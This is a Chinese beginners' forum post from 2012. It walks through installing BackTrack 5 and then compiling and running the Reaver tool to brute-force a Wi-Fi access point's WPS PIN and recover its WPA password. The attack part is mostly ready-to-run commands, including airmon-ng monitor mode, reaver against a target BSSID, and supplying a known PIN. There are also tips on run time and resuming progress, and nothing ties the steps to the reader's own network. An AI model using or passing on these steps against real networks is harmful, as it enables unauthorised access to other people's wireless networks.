本帖最后由 hwfsd 于 2012-1-23 20:22 编辑
写给新手,老鸟们请无视飘过吧。 测试系统建议BackTrack 5 R1。原因:对各种网卡驱动以及相关库支持的最好,下载Reaver后直接解压缩编译,毫无压力。 步骤1:前提需要一个2G以上的U盘(最好4G,因为BackTrack 5 的ISO镜像文件1.9G,2G U盘能否启动成功不确定)。使用UNetBootin制作BackTack 5 安装引导U盘。(不建议使用UltraISO) 步骤2:(警告:新手小心谨慎!!!如出现硬盘数据丢失或全盘格式化,概不负责!!!) 用PE在Windows分区之后(不要和Windows分区交叉)空余出至少20G硬盘空间,状态为自由,未分配,留着分给 “/” 与 ” swap“。 重启电脑,BIOS里设置一下U盘启动,出现引导界面, 输入:startx 就可以进入BackTrack 5系统了。双击左上角Install,将BackTrack 5 安装到先前划分的20G空白硬盘空间。 (1) 语言选择 自己喜好而定,有中文可选 (2) 地区选择 亚洲中国 (3) 键盘布局 默认就好 (4) 选手动指定分区(特别需要注意,别选错) (5) 选中未分配那块空间,点击 “添加” 逻辑分区 大小2000MB 用于 “交换空间” (6) 选中剩余那块未分配空间, 点击 “添加” 逻辑分区 大小为剩余全部 用于“ext4日志文件系统” 挂载点 “/”。 (7) 安装过程
完成后重启默认第一启动选项为BackTrack 5。
步骤3: 将Reaver1.3版放到桌面,开终端 cd /root/Desktop tar zxvf reaver-1.3.tar.gz
cd reaver-1.3/src
./configure
make
make install
airmon-ng start wlan0
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv
后面就是漫长的等待了,运气好3-5个小时会穷举成功(主要看人品),运气不好(尤其MAC为5C:6C:BF:XX:XX:XX的AP),等待你的可能会是一堆WARNING: Receive timeout occurred。
ps:貌似802.11N的AP才有wps功能,802.11g 802.11b请绕道。
ps: 遇到长时间 WARNING: Receive timeout occurred Ctrl + c 组合键保存进度退出即可。下次测试直接选 "y"读取进度即可,省时省力。
ps: 指定PIN得到WPA PSK
reaver -i mon0 -b xx:xx:xx:xx:xx:xx --pin=xxxxxxxx
ps:2012/01/23 (大年初一) reaver1.4正式版发布 链接如下
http://code.google.com/p/reaver-wps/downloads/list
|